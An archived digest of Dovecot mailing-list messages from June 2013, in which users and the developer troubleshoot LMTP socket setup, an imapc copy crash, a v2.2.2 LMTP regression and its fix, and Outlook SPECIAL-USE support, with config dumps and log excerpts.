From michael.miller at 12mm.net Sat Jun 1 00:01:58 2013 From: michael.miller at 12mm.net (Michael Miller) Date: Fri, 31 May 2013 23:01:58 +0200 Subject: [Dovecot] imapc "moving email to another folder" crashes In-Reply-To: <954B1241-6420-40B1-AED0-D4A61A16C48D@iki.fi> References: <954B1241-6420-40B1-AED0-D4A61A16C48D@iki.fi> Message-ID: <47D8A942-EF31-4868-BF14-7C89B9F3E989@12mm.net> Dear Timo, thank you very much - it is now working perfectly! BR On May 31, 2013, at 20:57 PM, Timo Sirainen wrote: > On 31.5.2013, at 21.23, Michael Miller wrote: > >> Hello List, >> >> I am having the same problem with dovecot 2.2.1 on RHEL and dovecot 2.2.2 on FreeBSD and the imapc proxy. >> moving eMail from one folder to another folder. the error is reproducible. >> >> May 31 19:57:45 imap(mail at --------.com): Panic: file mail-storage.c: line 2100 (mailbox_copy): assertion failed: (!ctx->unfinished) > > Yeah, I noticed a few days ago: http://hg.dovecot.org/dovecot-2.2/rev/0b02dc66e9f1 > > From tss at iki.fi Sat Jun 1 01:28:04 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 1 Jun 2013 01:28:04 +0300 Subject: [Dovecot] Fwd: MS asks for feedback on standards support in Outlook/Exchange References: <26ee0ca4-2cfe-473b-9da2-c72faafd3873@me.com> Message-ID: <3B542E10-8EE0-41CF-B667-640C0BB478E6@iki.fi> Someone should at least mention that they should support the real SPECIAL-USE instead of just Gmail-specific XLIST.. Begin forwarded message: > From: Andrew Laurence > Subject: [imapext] MS asks for feedback on standards support in Outlook/Exchange > Date: 1. kes?kuuta 2013 1.18.42 UTC+3.00 > To: HIED-EMAILADMIN at LISTSERV.ND.EDU, windows-hied at lists.stanford.edu, office365 at ucdavis.edu, imapext at ietf.org > > Hello everyone, > > Forgive the massive list cross-posting, but I thought this noteworthy enough to spread around. > > Via their Openness at Microsoft blog, Microsoft invites input on their standards support in Outlook and Exchange. I'm sure they'd like to hear thoughtful, detailed, insightful responses from the customer world at large. > http://blogs.technet.com/b/openness/archive/2013/05/31/feedback-exchange-server-and-outlook-standards.aspx > > Cheers, > Andrew > -- > Andrew Laurence Office of Information Technology > atlauren at uci.edu University of California, Irvine > atlauren at me.com (Lists) > > _______________________________________________ > imapext mailing list > imapext at ietf.org > https://www.ietf.org/mailman/listinfo/imapext From heshiming at gmail.com Sat Jun 1 04:34:28 2013 From: heshiming at gmail.com (He Shiming) Date: Sat, 1 Jun 2013 09:34:28 +0800 Subject: [Dovecot] dovecot-lmtp does not work In-Reply-To: <51A8F31B.904@delphinidae.org.uk> References: <51A8F31B.904@delphinidae.org.uk> Message-ID: Thanks Andy. But I do have this line 'protocols = lmtp imap pop3' in dovecot.conf. This line doesn't contain 'sieve' either. Is it possible for other config file to override this line? On Sat, Jun 1, 2013 at 2:59 AM, Andy R wrote: > Hi there, > > Have you added 'lmtp' to the protocols line in dovecot.conf ? It's not > listed in your doveconf -n. > > IE :- > > # Protocols we want to be serving. > #protocols = imap pop3 sieve > protocols = imap pop3 sieve lmtp > > > For logging, set "mail_debug = yes" (in /etc/dovecot/conf.d/10-**logging.conf > on my system). > > > > > On 31/05/2013 15:33, He Shiming wrote: > >> Dear Community, >> >> I've got a weird problem regarding lmtp setup with dovecot 2.0.19 on >> ubuntu >> 12.04.2 LTS. My reference of the configuration is at >> https://library.linode.com/**email/postfix/postfix2.9.6-** >> dovecot2.0.19-mysql, >> and my configuration is identical to it with the exception of opening the >> 110 pop3 port, and enabling plain text auth. Everything from imap, smtp, >> pop3 (including auth) works except for lmtp. >> >> I saw thousands of the following messages in /var/log/mail.log: >> >> May 31 09:05:24 postfix/lmtp[3664]: 2FD80321F4: to=, >> relay=none, delay=0.41, delays=0.41/0/0/0, dsn=4.4.1, status=deferred >> (connect to me.com[private/dovecot-lmtp]: No such file or directory) >> >> And it happens when an incoming email is received. >> >> Here's the output of configuration: >> >> root at prosp:/etc/dovecot/conf.**d# dovecot -n >> # 2.0.19: /etc/dovecot/dovecot.conf >> # OS: Linux 3.8.4-linode50 i686 Ubuntu 12.04.2 LTS ext3 >> auth_mechanisms = plain login >> disable_plaintext_auth = no >> mail_location = maildir:/var/mail/vhosts/%d/%n >> mail_privileged_group = mail >> managesieve_notify_capability = mailto >> managesieve_sieve_capability = fileinto reject envelope encoded-character >> vacation subaddress comparator-i;ascii-numeric relational regex imap4flags >> copy include variables body enotify environment mailbox date ihave >> passdb { >> args = /etc/dovecot/dovecot-sql.conf.**ext >> driver = sql >> } >> plugin { >> sieve = ~/.dovecot.sieve >> sieve_dir = ~/sieve >> } >> protocols = imap pop3 sieve >> service auth-worker { >> user = vmail >> } >> service auth { >> unix_listener /var/spool/postfix/private/**auth { >> group = postfix >> mode = 0666 >> user = postfix >> } >> unix_listener /var/spool/postfix/private/**dovecot-auth { >> group = postfix >> mode = 0660 >> user = postfix >> } >> unix_listener auth-userdb { >> mode = 0600 >> user = vmail >> } >> user = dovecot >> } >> service imap-login { >> inet_listener imap { >> port = 0 >> } >> } >> service lmtp { >> unix_listener /var/spool/postfix/private/**dovecot-lmtp { >> group = postfix >> mode = 0600 >> user = postfix >> } >> } >> service pop3-login { >> inet_listener pop3 { >> port = 110 >> } >> } >> ssl_cert = > ssl_cipher_list = >> ALL:!LOW:!SSLv2:ALL:!aNULL:!**ADH:!eNULL:!EXP:RC4+RSA:+HIGH:**+MEDIUM >> ssl_key = > userdb { >> args = uid=vmail gid=vmail home=/var/mail/vhosts/%d/%n >> driver = static >> } >> protocol imap { >> imap_client_workarounds = delay-newmail >> mail_max_userip_connections = 10 >> } >> protocol pop3 { >> mail_max_userip_connections = 10 >> pop3_client_workarounds = outlook-no-nuls oe-ns-eoh >> } >> protocol lda { >> deliver_log_format = msgid=%m: %$ >> mail_plugins = sieve >> postmaster_address = postmaster >> quota_full_tempfail = yes >> rejection_reason = Your message to <%t> was automatically rejected:%n%r >> } >> >> This problem has been discussed here: >> http://serverfault.com/**questions/512219/dovecot-lmtp-**does-not-exist. I've >> then tried switching from unix socket to inet listener, and still got the >> same result. I cannot get lmtp service to start. >> >> I'm also seeing no errors in the log when dovecot is restarted (see the >> above link for the log). >> >> I'm wondering how do I go about troubleshooting this problem? What might >> be >> the possible cause? Is it possible for dovecot to output verbose logs >> regarding service startups? >> >> Thank you. >> >> > -- Best regards, He Shiming *Kaoya.me | Goals.io | Toppin'Wiper | MediaMan * From heshiming at gmail.com Sat Jun 1 04:39:49 2013 From: heshiming at gmail.com (He Shiming) Date: Sat, 1 Jun 2013 09:39:49 +0800 Subject: [Dovecot] dovecot-lmtp does not work In-Reply-To: References: <51A8F31B.904@delphinidae.org.uk> Message-ID: I discovered that the line is actually overridden by /etc/dovecot/conf.d/01-mail-stack-delivery.conf:protocols = imap pop3 sieve . Therefore the protocol is not up. I've modified this line and it worked. Thanks for you help. On Sat, Jun 1, 2013 at 9:34 AM, He Shiming wrote: > Thanks Andy. But I do have this line 'protocols = lmtp imap pop3' in > dovecot.conf. This line doesn't contain 'sieve' either. Is it possible for > other config file to override this line? > > > On Sat, Jun 1, 2013 at 2:59 AM, Andy R wrote: > >> Hi there, >> >> Have you added 'lmtp' to the protocols line in dovecot.conf ? It's not >> listed in your doveconf -n. >> >> IE :- >> >> # Protocols we want to be serving. >> #protocols = imap pop3 sieve >> protocols = imap pop3 sieve lmtp >> >> >> For logging, set "mail_debug = yes" (in /etc/dovecot/conf.d/10-**logging.conf >> on my system). >> >> >> >> >> On 31/05/2013 15:33, He Shiming wrote: >> >>> Dear Community, >>> >>> I've got a weird problem regarding lmtp setup with dovecot 2.0.19 on >>> ubuntu >>> 12.04.2 LTS. My reference of the configuration is at >>> https://library.linode.com/**email/postfix/postfix2.9.6-** >>> dovecot2.0.19-mysql, >>> and my configuration is identical to it with the exception of opening the >>> 110 pop3 port, and enabling plain text auth. Everything from imap, smtp, >>> pop3 (including auth) works except for lmtp. >>> >>> I saw thousands of the following messages in /var/log/mail.log: >>> >>> May 31 09:05:24 postfix/lmtp[3664]: 2FD80321F4: to=, >>> relay=none, delay=0.41, delays=0.41/0/0/0, dsn=4.4.1, status=deferred >>> (connect to me.com[private/dovecot-lmtp]: No such file or directory) >>> >>> And it happens when an incoming email is received. >>> >>> Here's the output of configuration: >>> >>> root at prosp:/etc/dovecot/conf.**d# dovecot -n >>> # 2.0.19: /etc/dovecot/dovecot.conf >>> # OS: Linux 3.8.4-linode50 i686 Ubuntu 12.04.2 LTS ext3 >>> auth_mechanisms = plain login >>> disable_plaintext_auth = no >>> mail_location = maildir:/var/mail/vhosts/%d/%n >>> mail_privileged_group = mail >>> managesieve_notify_capability = mailto >>> managesieve_sieve_capability = fileinto reject envelope encoded-character >>> vacation subaddress comparator-i;ascii-numeric relational regex >>> imap4flags >>> copy include variables body enotify environment mailbox date ihave >>> passdb { >>> args = /etc/dovecot/dovecot-sql.conf.**ext >>> driver = sql >>> } >>> plugin { >>> sieve = ~/.dovecot.sieve >>> sieve_dir = ~/sieve >>> } >>> protocols = imap pop3 sieve >>> service auth-worker { >>> user = vmail >>> } >>> service auth { >>> unix_listener /var/spool/postfix/private/**auth { >>> group = postfix >>> mode = 0666 >>> user = postfix >>> } >>> unix_listener /var/spool/postfix/private/**dovecot-auth { >>> group = postfix >>> mode = 0660 >>> user = postfix >>> } >>> unix_listener auth-userdb { >>> mode = 0600 >>> user = vmail >>> } >>> user = dovecot >>> } >>> service imap-login { >>> inet_listener imap { >>> port = 0 >>> } >>> } >>> service lmtp { >>> unix_listener /var/spool/postfix/private/**dovecot-lmtp { >>> group = postfix >>> mode = 0600 >>> user = postfix >>> } >>> } >>> service pop3-login { >>> inet_listener pop3 { >>> port = 110 >>> } >>> } >>> ssl_cert = >> ssl_cipher_list = >>> ALL:!LOW:!SSLv2:ALL:!aNULL:!**ADH:!eNULL:!EXP:RC4+RSA:+HIGH:**+MEDIUM >>> ssl_key = >> userdb { >>> args = uid=vmail gid=vmail home=/var/mail/vhosts/%d/%n >>> driver = static >>> } >>> protocol imap { >>> imap_client_workarounds = delay-newmail >>> mail_max_userip_connections = 10 >>> } >>> protocol pop3 { >>> mail_max_userip_connections = 10 >>> pop3_client_workarounds = outlook-no-nuls oe-ns-eoh >>> } >>> protocol lda { >>> deliver_log_format = msgid=%m: %$ >>> mail_plugins = sieve >>> postmaster_address = postmaster >>> quota_full_tempfail = yes >>> rejection_reason = Your message to <%t> was automatically >>> rejected:%n%r >>> } >>> >>> This problem has been discussed here: >>> http://serverfault.com/**questions/512219/dovecot-lmtp-**does-not-exist. I've >>> then tried switching from unix socket to inet listener, and still got the >>> same result. I cannot get lmtp service to start. >>> >>> I'm also seeing no errors in the log when dovecot is restarted (see the >>> above link for the log). >>> >>> I'm wondering how do I go about troubleshooting this problem? What might >>> be >>> the possible cause? Is it possible for dovecot to output verbose logs >>> regarding service startups? >>> >>> Thank you. >>> >>> >> > > > -- > Best regards, > He Shiming > *Kaoya.me | Goals.io > | Toppin'Wiper > | MediaMan * > -- Best regards, He Shiming *Kaoya.me | Goals.io | Toppin'Wiper | MediaMan * From rs at sys4.de Sat Jun 1 09:35:08 2013 From: rs at sys4.de (Robert Schetterer) Date: Sat, 01 Jun 2013 08:35:08 +0200 Subject: [Dovecot] Fwd: MS asks for feedback on standards support in Outlook/Exchange In-Reply-To: <3B542E10-8EE0-41CF-B667-640C0BB478E6@iki.fi> References: <26ee0ca4-2cfe-473b-9da2-c72faafd3873@me.com> <3B542E10-8EE0-41CF-B667-640C0BB478E6@iki.fi> Message-ID: <51A9961C.4080500@sys4.de> Am 01.06.2013 00:28, schrieb Timo Sirainen: > Someone should at least mention that they should support the real SPECIAL-USE instead of just Gmail-specific XLIST.. i cant see any major Problems recent with i.e outlook 2013 and dovecot and SPECIAL-USE, perhaps look the screens at http://sys4.de/de/blog/2013/03/25/outlook-2013-special-use-mit-dovecot/ for sure Outlook 2013 will stay the client of exchange ,as ever , and is not an internet mail client in prime, also their "Junk" Folder implementation isnt realy compatible, and at last tests, they do only a "one time" look up for SPECIAL-USE my speculation is ,that they like to stop small exchange product lines, pushing users to outlook.com, microsoft cloud and/or partner supported enterprise exchange setups ,in the future , open source seems not the major challange for them, i guess they like to get more competitive with gmail having complete solution specially with the mobile market Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From eric at ericabrahamsen.net Sat Jun 1 13:24:14 2013 From: eric at ericabrahamsen.net (Eric Abrahamsen) Date: Sat, 01 Jun 2013 18:24:14 +0800 Subject: [Dovecot] recursive mail_location? References: <87obbt42oy.fsf@ericabrahamsen.net> <1579535.YRSr3nuAER@karol1-530u3c-530u4c> <87wqqggf3w.fsf@ericabrahamsen.net> Message-ID: <87fvx2dt81.fsf@ericabrahamsen.net> Eric Abrahamsen writes: > Karol Jurak writes: > >> On Thursday 30 of May 2013 10:33:01 Eric Abrahamsen wrote: >>> Does anyone have a recommended way of handling this? Is it possible to >>> either "flatten" the structure further, or somehow tell dovecot to >>> recurse into directories? I don't mind having a separate gnus server >>> for each mail account, but I'd hate to have to do one per mailbox. >> >> Maybe setting LAYOUT=fs (and possibly DIRNAME) in mail_location could >> somehow help you? >> >> More on this settings is here: >> >> http://wiki2.dovecot.org/MailLocation/Maildir Hmm, googling further leads me to believe that dovecot and isync/mbsync simply won't work together out of the box, as they keep uid validity in different formats: http://dovecot.2317879.n4.nabble.com/More-detail-re-dovecot-uidlist-and-uidvalidity-files-td39232.html From CMarcus at Media-Brokers.com Sat Jun 1 14:36:30 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Sat, 01 Jun 2013 07:36:30 -0400 Subject: [Dovecot] Settings: Dovecot + NTLM + Single Sing On + Windows + Outlook or Thunderbird. In-Reply-To: References: <51A78155.8030804@Media-Brokers.com> Message-ID: <51A9DCBE.2020908@Media-Brokers.com> Fix your line wrapping. The below is way too difficult to read for most people to waste time trying to decipher. On 2013-05-31 3:02 PM, Maria Jose Ya?ez Dacosta wrote: > If I do "doveconf -n" it show > > # 2.1.16: /usr/local/etc/dovecot/dovecot.conf # OS: Linux > 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) > auth_use_winbind = yes namespace inbox { inbox = yes location = mailbox > Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } > mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use > = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { driver > = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 > home=/mail/%d/%n allow_all_users=yes driver = static } > The things I do not recognize are: > > mechanisms = plain ntlm login -- Best regards, Charles Marcus I.T. Director Media Brokers International, Inc. 678.514.6224 | 678.514.6299 fax From tss at iki.fi Sat Jun 1 14:40:25 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 1 Jun 2013 14:40:25 +0300 Subject: [Dovecot] MS asks for feedback on standards support in Outlook/Exchange In-Reply-To: <51A9961C.4080500@sys4.de> References: <26ee0ca4-2cfe-473b-9da2-c72faafd3873@me.com> <3B542E10-8EE0-41CF-B667-640C0BB478E6@iki.fi> <51A9961C.4080500@sys4.de> Message-ID: <5BA23AC4-C341-4690-974D-D64606273F28@iki.fi> On 1.6.2013, at 9.35, Robert Schetterer wrote: > Am 01.06.2013 00:28, schrieb Timo Sirainen: >> Someone should at least mention that they should support the real SPECIAL-USE instead of just Gmail-specific XLIST.. > > i cant see any major Problems recent with i.e outlook 2013 and dovecot > and SPECIAL-USE, perhaps look the screens at What about http://dovecot.org/list/dovecot/2013-May/090489.html ? From tss at iki.fi Sat Jun 1 14:44:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 1 Jun 2013 14:44:38 +0300 Subject: [Dovecot] recursive mail_location? In-Reply-To: <87fvx2dt81.fsf@ericabrahamsen.net> References: <87obbt42oy.fsf@ericabrahamsen.net> <1579535.YRSr3nuAER@karol1-530u3c-530u4c> <87wqqggf3w.fsf@ericabrahamsen.net> <87fvx2dt81.fsf@ericabrahamsen.net> Message-ID: <34713524-94BF-407D-9040-7C030116FD91@iki.fi> On 1.6.2013, at 13.24, Eric Abrahamsen wrote: > Eric Abrahamsen writes: > >> Karol Jurak writes: >> >>> On Thursday 30 of May 2013 10:33:01 Eric Abrahamsen wrote: >>>> Does anyone have a recommended way of handling this? Is it possible to >>>> either "flatten" the structure further, or somehow tell dovecot to >>>> recurse into directories? I don't mind having a separate gnus server >>>> for each mail account, but I'd hate to have to do one per mailbox. >>> >>> Maybe setting LAYOUT=fs (and possibly DIRNAME) in mail_location could >>> somehow help you? >>> >>> More on this settings is here: >>> >>> http://wiki2.dovecot.org/MailLocation/Maildir > > Hmm, googling further leads me to believe that dovecot and isync/mbsync > simply won't work together out of the box, as they keep uid validity in > different formats: > > http://dovecot.2317879.n4.nabble.com/More-detail-re-dovecot-uidlist-and-uidvalidity-files-td39232.html There is only one format for IMAP UIDVALIDITY. dovecot-uidlist stores the UIDVALIDITY in hex, but it's still visible as a regular base10 integer via IMAP. I don't know about isync, mbsync or gnus. From tlx at leuxner.net Sat Jun 1 15:10:32 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Sat, 1 Jun 2013 14:10:32 +0200 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP Message-ID: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 ==> /var/log/mail.log <== Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) ==> /var/log/dovecot/dovecot.log <== Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty Regards Thomas -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 203 bytes Desc: Message signed with OpenPGP using GPGMail URL: From devocotml at fuckaround.org Sat Jun 1 15:15:54 2013 From: devocotml at fuckaround.org (devocotml at fuckaround.org) Date: Sat, 1 Jun 2013 14:15:54 +0200 Subject: [Dovecot] real and virtual users Message-ID: <5cc2e5b49f7e020a75f2f59c43d81e7d.squirrel@fuckaround.org> Hi all! I use debian with real users (pam) and virtual users: I receive mail from virtual users but not from real users. Real users can connect and do login but no email received :-( Any idea? thanks! dovecot -n # 1.2.15: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-5-686 i686 Debian 6.0.7 log_path: /var/log/dovecot.log log_timestamp: %Y-%m-%d %H:%M:%S protocols: pop3s ssl_cert_file: /etc/dovecot/ssl/dovecotpop.crt ssl_key_file: /etc/dovecot/ssl/dovecotpop.key login_dir: /var/run/dovecot/login login_executable: /usr/lib/dovecot/pop3-login mail_location: maildir:~Maildir mbox_write_locks: fcntl dotlock mail_executable: /usr/lib/dovecot/pop3 mail_plugin_dir: /usr/lib/dovecot/modules/pop3 lda: auth_socket_path: /var/run/dovecot/auth-master postmaster_address: max at nuvolabianca.org mail_plugins: sieve log_path: /var/log/dovecot-lda.log log_path: auth default: mechanisms: plain login verbose: yes passdb: driver: passwd-file args: scheme=SHA256 /etc/dovecot/v_users.conf passdb: driver: pam userdb: driver: static args: uid=5000 gid=5000 home=/home/vhosts/%d/%n allow_all_users=yes socket: type: listen client: path: /var/spool/postfix/private/auth mode: 432 user: postfix group: postfix master: path: /var/run/dovecot/auth-master mode: 384 user: vmail group: vmail From jk at jkart.de Sat Jun 1 15:32:02 2013 From: jk at jkart.de (Jim Knuth) Date: Sat, 01 Jun 2013 14:32:02 +0200 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> Message-ID: <51A9E9C2.6080809@jkart.de> am 01.06.13 14:10 schrieb Thomas Leuxner : > Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 > > ==> /var/log/mail.log <== > Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) > > ==> /var/log/dovecot/dovecot.log <== > Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty > > Regards > Thomas > yes, I've downgrade -- Mit freundlichen Gr??en, with kind regards, Jim Knuth --------- Wenn es morgens um sechs Uhr an meiner T?r l?utet und ich sicher sein kann, da? es der Milchmann ist, dann wei? ich, da? ich in einer Demokratie lebe. [Churchill] From tss at iki.fi Sat Jun 1 15:34:29 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 1 Jun 2013 15:34:29 +0300 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> Message-ID: <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> On 1.6.2013, at 15.10, Thomas Leuxner wrote: > Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 > > ==> /var/log/mail.log <== > Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) > > ==> /var/log/dovecot/dovecot.log <== > Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de From jk at jkart.de Sat Jun 1 15:41:13 2013 From: jk at jkart.de (Jim Knuth) Date: Sat, 01 Jun 2013 14:41:13 +0200 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> Message-ID: <51A9EBE9.3080306@jkart.de> am 01.06.13 14:34 schrieb Timo Sirainen : > On 1.6.2013, at 15.10, Thomas Leuxner wrote: > >> Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 >> >> ==> /var/log/mail.log <== >> Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) >> >> ==> /var/log/dovecot/dovecot.log <== >> Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty > > Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de > Is that now 2:2.2.2-0~auto+30 or must I wait to 2:2.2.2-0~auto+31? Debian shows only 2:2.2.2-0~auto+30. -- Mit freundlichen Gr??en, with kind regards, Jim Knuth --------- Der Idealismus w?chst mit der Entfernung vom Problem. (John Galsworthy) From tss at iki.fi Sat Jun 1 15:46:28 2013 From: tss at iki.fi (Timo Sirainen) Date: Sat, 1 Jun 2013 15:46:28 +0300 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <51A9EBE9.3080306@jkart.de> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> <51A9EBE9.3080306@jkart.de> Message-ID: On 1.6.2013, at 15.41, Jim Knuth wrote: > am 01.06.13 14:34 schrieb Timo Sirainen : > >> On 1.6.2013, at 15.10, Thomas Leuxner wrote: >> >>> Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 >>> >>> ==> /var/log/mail.log <== >>> Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) >>> >>> ==> /var/log/dovecot/dovecot.log <== >>> Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty >> >> Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de >> > > Is that now 2:2.2.2-0~auto+30 or must I wait to 2:2.2.2-0~auto+31? > Debian shows only 2:2.2.2-0~auto+30. Since I fixed it 10 minutes ago, I doubt there's a .deb for it yet. From jk at jkart.de Sat Jun 1 15:49:08 2013 From: jk at jkart.de (Jim Knuth) Date: Sat, 01 Jun 2013 14:49:08 +0200 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> <51A9EBE9.3080306@jkart.de> Message-ID: <51A9EDC4.7000008@jkart.de> am 01.06.13 14:46 schrieb Timo Sirainen : > On 1.6.2013, at 15.41, Jim Knuth wrote: > >> am 01.06.13 14:34 schrieb Timo Sirainen : >> >>> On 1.6.2013, at 15.10, Thomas Leuxner wrote: >>> >>>> Suppose this one breaks it: http://hg.dovecot.org/dovecot-2.2/rev/c4a85c9df948 >>>> >>>> ==> /var/log/mail.log <== >>>> Jun 1 14:01:30 spectre postfix/lmtp[456]: 3bN0qP5kwFzSy: to=, relay=spectre.leuxner.net[private/dovecot-lmtp], delay=1481, delays=1481/0/0.01/0.01, dsn=4.3.0, status=deferred (host spectre.leuxner.net[private/dovecot-lmtp] said: 451 4.3.0 Temporary internal error (in reply to end of DATA command)) >>>> >>>> ==> /var/log/dovecot/dovecot.log <== >>>> Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty >>> >>> Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de >>> >> >> Is that now 2:2.2.2-0~auto+30 or must I wait to 2:2.2.2-0~auto+31? >> Debian shows only 2:2.2.2-0~auto+30. > > Since I fixed it 10 minutes ago, I doubt there's a .deb for it yet. > thanks, was only a question ? sorry -- Mit freundlichen Gr??en, with kind regards, Jim Knuth --------- Ein Arch?ologe ist der beste Ehemann, den eine Frau haben kann; je ?lter sie wird, um so mehr interessiert er sich f?r sie. (Agatha Christie) From ronleach at tesco.net Sat Jun 1 16:14:38 2013 From: ronleach at tesco.net (Ron Leach) Date: Sat, 01 Jun 2013 14:14:38 +0100 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <51A9EBE9.3080306@jkart.de> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> <51A9EBE9.3080306@jkart.de> Message-ID: <51A9F3BE.5040201@tesco.net> On 01/06/2013 13:41, Jim Knuth wrote: > am 01.06.13 14:34 schrieb Timo Sirainen : >> Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de >> > > Is that now 2:2.2.2-0~auto+30 or must I wait to 2:2.2.2-0~auto+31? > Debian shows only 2:2.2.2-0~auto+30. Assuming you're using the Dovecot pre-built binaries, http://xi.rename-it.nl/debian/pool/stable-auto/dovecot-2.2/dovecot_2.2.2-0~auto+30_amd64.changes with file time 01-Jun-2013 05:48, says it was built following "* New revision (16444:7b1152c83e3e) in dovecot Mercurial repository:" So auto-30 (which is precisely the revision mentioned in the OP message title) does not have this fix, which is a different revision number. regards, Ron From tlx at leuxner.net Sat Jun 1 16:47:36 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Sat, 1 Jun 2013 15:47:36 +0200 Subject: [Dovecot] v2.2.2 (7b1152c83e3e) latest changes break LMTP In-Reply-To: <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> References: <4AB59651-C9E5-476F-834A-D084CAD3BC8E@leuxner.net> <80E98308-AAF8-426B-A76A-E5E3179C8035@iki.fi> Message-ID: <20130601134736.GA23191@nihlus.leuxner.net> * Timo Sirainen 2013.06.01 14:34: > > ==> /var/log/dovecot/dovecot.log <== > > Jun 1 14:01:30 spectre dovecot: lmtp(523): Error: Can't open delivery mail as raw: Invalid mailbox name: Name is empty > > Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/05b6cd9220de Looks good now. Thanks. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From rs at sys4.de Sat Jun 1 20:53:12 2013 From: rs at sys4.de (Robert Schetterer) Date: Sat, 01 Jun 2013 